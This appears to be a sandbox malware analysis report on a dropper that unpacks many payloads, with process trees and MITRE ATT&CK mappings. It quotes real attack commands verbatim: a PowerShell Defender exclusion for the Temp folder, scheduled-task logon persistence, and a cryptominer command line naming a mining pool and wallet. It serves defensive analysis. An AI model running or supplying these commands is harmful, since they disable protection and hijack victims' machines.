Token: SeChangeNotifyPrivilege	2904	explorer.exe
Token: SeCreateTokenPrivilege	2904	explorer.exe
Token: SeMachineAccountPrivilege	2904	explorer.exe
Token: SeSecurityPrivilege	2904	explorer.exe
Token: SeAssignPrimaryTokenPrivilege	2904	explorer.exe
Token: SeCreateGlobalPrivilege	2904	explorer.exe
Token: 33	2904	explorer.exe
Token: SeShutdownPrivilege	1144	Explorer.EXE
Token: SeShutdownPrivilege	1144	Explorer.EXE
Token: SeLockMemoryPrivilege	2168	explorer.exe
Token: SeLockMemoryPrivilege	2168	explorer.exe
Token: SeDebugPrivilege	1656	5a79sogswm_1.exe
Token: SeRestorePrivilege	1656	5a79sogswm_1.exe
Token: SeBackupPrivilege	1656	5a79sogswm_1.exe
Token: SeLoadDriverPrivilege	1656	5a79sogswm_1.exe
Token: SeCreatePagefilePrivilege	1656	5a79sogswm_1.exe
Token: SeShutdownPrivilege	1656	5a79sogswm_1.exe
Token: SeTakeOwnershipPrivilege	1656	5a79sogswm_1.exe
Token: SeChangeNotifyPrivilege	1656	5a79sogswm_1.exe
Token: SeCreateTokenPrivilege	1656	5a79sogswm_1.exe
Token: SeMachineAccountPrivilege	1656	5a79sogswm_1.exe
Token: SeSecurityPrivilege	1656	5a79sogswm_1.exe
Token: SeAssignPrimaryTokenPrivilege	1656	5a79sogswm_1.exe
Token: SeCreateGlobalPrivilege	1656	5a79sogswm_1.exe
Token: 33	1656	5a79sogswm_1.exe
Token: SeShutdownPrivilege	1144	Explorer.EXE
Token: SeShutdownPrivilege	1144	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_installer.exesetup_install.execmd.exe

description	pid	process	target process
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 1940 wrote to memory of 2716	1940	setup_installer.exe	setup_install.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2612	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2636	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3032	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 3064	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2292	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1040	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 2536	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2716 wrote to memory of 1608	2716	setup_install.exe	cmd.exe
PID 2636 wrote to memory of 2144	2636	cmd.exe	Sun1477d99f5afb5a49.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940
- C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2716
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 304
  2⤵
  - Program crash
  PID:480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 480 -s 628
    3⤵
    - Program crash
    PID:2852

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144
- C:\Users\Admin\AppData\Local\Temp\7A3F.exe
  C:\Users\Admin\AppData\Local\Temp\7A3F.exe
  2⤵
  - Sets file execution options in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- - C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    3⤵
    - Modifies firewall policy service
    - Sets file execution options in registry
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies Internet Explorer Protected Mode
    - Modifies Internet Explorer Protected Mode Banner
    - Modifies Internet Explorer settings
    - NTFS ADS
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\5a79sogswm_1.exe
      /suac
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious use of AdjustPrivilegeToken
      PID:1656
- C:\Users\Admin\AppData\Local\Temp\8058.exe
  C:\Users\Admin\AppData\Local\Temp\8058.exe
  2⤵
  - Executes dropped EXE
  PID:1756

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1477d99f5afb5a49.exe
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2636
- C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun1477d99f5afb5a49.exe
  Sun1477d99f5afb5a49.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 652
    3⤵
    - Program crash
    PID:1484

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun1479047a006c5.exe
Sun1479047a006c5.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2136
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1836
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:2708
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:2076
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:2124
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:1184
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2168
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1216
- - C:\Users\Admin\AppData\Local\Temp\is-7NFSK.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-7NFSK.tmp\setup_2.tmp" /SL5="$80168,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:712
- C:\Users\Admin\AppData\Local\Temp\3002.exe
  "C:\Users\Admin\AppData\Local\Temp\3002.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2316
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2000
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 1124
  2⤵
  - Loads dropped DLL
  - Program crash
  PID:2112
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Looks for VMWare services registry key.
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2344
- C:\Users\Admin\AppData\Local\Temp\2.exe
  "C:\Users\Admin\AppData\Local\Temp\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe
  "C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2716 -s 424
1⤵
- Program crash
PID:1716

C:\Users\Admin\AppData\Local\Temp\is-G78EQ.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G78EQ.tmp\setup_2.tmp" /SL5="$90168,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:1924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "773176760130574276742631418318995998-2116209459-13302152718143002381597084398"
1⤵
PID:1984

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 944
1⤵
- Program crash
PID:2068
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 608
  2⤵
  - Program crash
  PID:2600

C:\Users\Admin\AppData\Local\Temp\is-5SLRT.tmp\Sun1410432520b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5SLRT.tmp\Sun1410432520b.tmp" /SL5="$201C2,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun1410432520b.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1684

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun14c78e5159b8.exe
Sun14c78e5159b8.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2192

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun14c031e6f3d78.exe
Sun14c031e6f3d78.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1720

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun14115415e7a48116.exe
Sun14115415e7a48116.exe
1⤵
- Executes dropped EXE
PID:1576

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun1410432520b.exe
Sun1410432520b.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2852

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun14eb4b7c17.exe
Sun14eb4b7c17.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\Sun14d2ba445ad3.exe
Sun14d2ba445ad3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1479047a006c5.exe
1⤵
- Loads dropped DLL
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun14d2ba445ad3.exe
1⤵
- Loads dropped DLL
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun14c78e5159b8.exe
1⤵
- Loads dropped DLL
PID:2536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1410432520b.exe
1⤵
- Loads dropped DLL
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun14c031e6f3d78.exe
1⤵
- Loads dropped DLL
PID:2292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun14115415e7a48116.exe
1⤵
- Loads dropped DLL
PID:3064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun14eb4b7c17.exe
1⤵
- Loads dropped DLL
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
PID:2612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2307786-1548063001136999428910332442031328812774-2141003786-1844832665-585682258"
1⤵
PID:2948

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
1⤵
- Creates scheduled task(s)
PID:2264

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
1⤵
- Creates scheduled task(s)
PID:2736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery